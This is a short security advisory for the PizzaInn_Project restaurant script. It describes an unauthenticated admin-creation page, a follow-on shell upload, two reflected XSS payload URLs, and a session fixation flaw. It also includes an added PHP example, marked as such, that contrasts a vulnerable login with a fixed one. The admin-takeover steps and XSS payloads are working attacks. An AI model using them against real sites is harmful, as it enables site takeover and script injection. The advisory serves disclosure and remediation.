================================================================================
| # Title : Restaurant Script (PizzaInn_Project) Add Admin Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : RSv1.0.0
| # Tested on: Windows 8.1 French (Pro)
| # Bug : Add Admin
| # Download : sourceforge.net/projects/restaurantmis/files/RSv1.0.0.zip/download
================================================================================
Add admin:
http://localhost/food/install/administration.php
You can then add food items and upload a shell; find it here: http://localhost/3/images/oo.php
XSS:
/food/foodzone.php/%22onmouseover%3d'prompt(901513)'bad%3d%22>
/food/specialdeals.php/%22onmouseover%3d'prompt(938323)'bad%3d%22>
Session fixation:
Affected items:
/admin/index.php
/contactus.php
/member-index.php
/register-exec.php
The impact of this vulnerability:
An attacker can fixate (set) a victim's session identifier.
How to fix this vulnerability:
Web applications must ignore any session ID provided by the user's browser at login and must always generate a new session ID, to which the user is bound only after successful authentication.
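The fix described above, as an added PHP example that is not code from this advisory or from the PizzaInn_Project application; check_credentials() and the sample password are constructed stand-ins for the app's own user lookup:

```php
<?php
// Added example (not part of the advisory or the PizzaInn_Project code):
// a minimal login handler showing the session-fixation bug beside the fix.
// check_credentials() is a hypothetical helper standing in for the app's own lookup.

function check_credentials(string $user, string $pass): bool
{
    // Constructed sample user; real code would read a password_hash() value from the DB.
    $stored = ['admin' => password_hash('constructed-sample-password', PASSWORD_DEFAULT)];
    return isset($stored[$user]) && password_verify($pass, $stored[$user]);
}

// VULNERABLE: the login keeps whatever session ID the browser presented.
// If that ID was planted beforehand, whoever planted it now holds the
// victim's authenticated session.
function login_vulnerable(string $user, string $pass): bool
{
    session_start();                       // resumes the caller-supplied ID as-is
    if (!check_credentials($user, $pass)) {
        return false;
    }
    $_SESSION['user'] = $user;             // privilege attached to a pre-set ID
    return true;
}

// FIXED: authenticate first, then discard the presented ID and issue a fresh one.
function login_fixed(string $user, string $pass): bool
{
    // Only resume IDs the server itself issued; uninitialized IDs are rejected.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');   // no session ID via the URL
    session_start();
    if (!check_credentials($user, $pass)) {
        return false;
    }
    session_regenerate_id(true);           // new ID; the old ID's data is deleted
    $_SESSION['user'] = $user;
    $_SESSION['login_at'] = time();
    return true;
}
```

Both ini_set() calls must run before session_start(); setting them in php.ini for the whole application is the more robust option.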
Greetz :----------------------------------------------------------------------------------------
|                                                                                              |
| jericho * Larry W. Cashdollar * shadow0075 * djroot.dz * Gjoko 'LiquidWorm' Krstic           |
|                                                                                              |
================================================================================================